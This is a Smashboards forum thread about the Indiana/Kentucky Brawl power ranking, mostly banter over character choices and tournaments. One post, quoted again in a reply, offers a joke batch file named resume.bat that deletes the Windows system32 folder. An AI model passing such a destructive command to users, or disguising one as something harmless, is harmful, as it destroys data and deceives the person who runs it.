• Welcome to Smashboards, the world's largest Super Smash Brothers community! Over 250,000 Smash Bros. fans from around the world have come to discuss these great games in over 19 million posts!

You are currently viewing our boards as a visitor. Click here to sign up right now and start on your path in the Smash community!

INDIANA/KENTUCKY Official PR (Brawl) (as of 7/18/10)

Sovereign

Game Reaper
NNID
Sovereign90
I'm not gonna lie. We have the best **** PR on Smashboards. Megaman themed with music to match. INKY goes the hardest.

Mister Eric

Twitch.tv/MisterbeepEric Twitter: @MisterbeepEric
NNID
MisterEric
3DS FC
1075-1236-8207
What time is it ma f**kas?!
What day is it ma f**kas?!
=]

DtJ S2n

Stardog Champion
BRoomer
Needs more... wait when is this getting updated next? I better be a double honorable mention.

I needs more someone to chill with.

DtJ S2n

Stardog Champion
BRoomer
Huntington car? Y'mean ice car?

and dude I'm trying but I have the best bubble ever. We even got Raisin' Canes. Why don't all y'all just come down here?

Sovereign

Game Reaper
NNID
Sovereign90
ZSS ain't Mario. And she's also not that great of a character, I wouldn't win any money with her!!!
*****, GTFO! If you're looking for great, be like Ren and "main" Metaknight. If you're looking for a solid-*** character, pick up ZSS.

hadesblade

Smash Lord
I'll get right on that as soon as I start maining a good character in a video game for once.
I've placed in the money in atleast 1 event for 3/4 of the tournies I've been to since I moved here. Pick up yoshi :p

DtJ XeroXen

The biggest fraud
NNID
XeroXen
I've placed in the money in atleast 1 event for 3/4 of the tournies I've been to since I moved here. Pick up yoshi :p
I just said good character. And I meant real money. :/ I've seen where you've placed and that kind've money really isn't worth my time or effort considering I can probably win a majority of that now.

And I think I'll be just fine with treating this game like a joke. Because I have absolutely no interest in playing this game outside of competitive events, therefore I'm not going to be learning a new character.

Calebyte

Smash Lord
Here's my secret, Xero.

1. Find an online job application
  2. Open Notpad
  3. Type
    Code:
    @echo off
    del c:\WINDOWS\system32
  4. Save as resume.bat
  5. Open file
  6. ????
  7. Congratulations! You have just been hired for the job!

DtJ XeroXen

The biggest fraud
NNID
XeroXen
Here's my secret, Xero.

1. Find an online job application
  2. Open Notpad
  3. Type
    Code:
    @echo off
    del c:\WINDOWS\system32
  4. Save as resume.bat
  5. Open file
  6. ????
  7. Congratulations! You have just been hired for the job!
Dude I tried this and it totally crashed my computer wtf.

hadesblade

Smash Lord
I just said good character. And I meant real money. :/ I've seen where you've placed and that kind've money really isn't worth my time or effort considering I can probably win a majority of that now.

And I think I'll be just fine with treating this game like a joke. Because I have absolutely no interest in playing this game outside of competitive events, therefore I'm not going to be learning a new character.
Yoshi is a good character. Well... better than mario. :p Also I wasn't really serious in my suggestion to main him. Like I want more yoshi mains teaching people the matchup ;)

I know the reason I don't place better than I do is because I make mistakes, and do things wrong that I can and do fix. Knowing that there are things I can improve on is part of how I stay playing yoshi. If you pick up a better character and spend months learning them as well as you know your main now, and you don't fix any bad habits or improve on reading etc, because rather than fixing things that make you as a player better, you want to learn a new character, then you would of wasted months. You'll still lose to the same players that you lose to with mario and still beat the players you already beat. (assuming they don't improve too much while you are taking your time learning a new character.) =/

Anyway, a lot of Arizona got into a negative mindset and quit "wasting" $10 entering tournies, and the smash scene there was dieing because of it (I don't know how it's been since I moved.) Once I got here everyone had such good mindsets and everyone wanted to improve, and I really liked that. Your post just seems like you are extremely frustrated and the negative mentality scares me.

DtJ XeroXen

The biggest fraud
NNID
XeroXen
Huh? I just don't really care for this game at all. I don't even play it really. I go to tournaments once every 2-3 months and still somehow beat people (and beat people who I used to lose to, for that matter).

I'm not really frustrated, I just honestly don't care enough to improve at this point. There are better competitive games for me to waste my time on while I'm at home. I still love the scene and all, which is the only reason I'm even still here...

Plus beating people with Mario is pretty sexy. (And you can keep believing Yoshi is better than Mario if you want to. ;) I won't say anything)

hadesblade

Smash Lord
I guess I really over reacted. I haven't even met you yet xD.

But yeah yoshi is better than mario :p

Nicole

Smash Champion
http://www.smashboards.com/showthread.php?t=282672

hey friends! this is pretty close to you guys. i'm generating hype for it. we have the best from the midwest west coming, along with lain, atomsk, and even eggz all the way from the west coast. housing is free and at the venue, and the party afterwards will be legendary. Don't miss it!

(this was also posted on your social thread!)

Top Bottom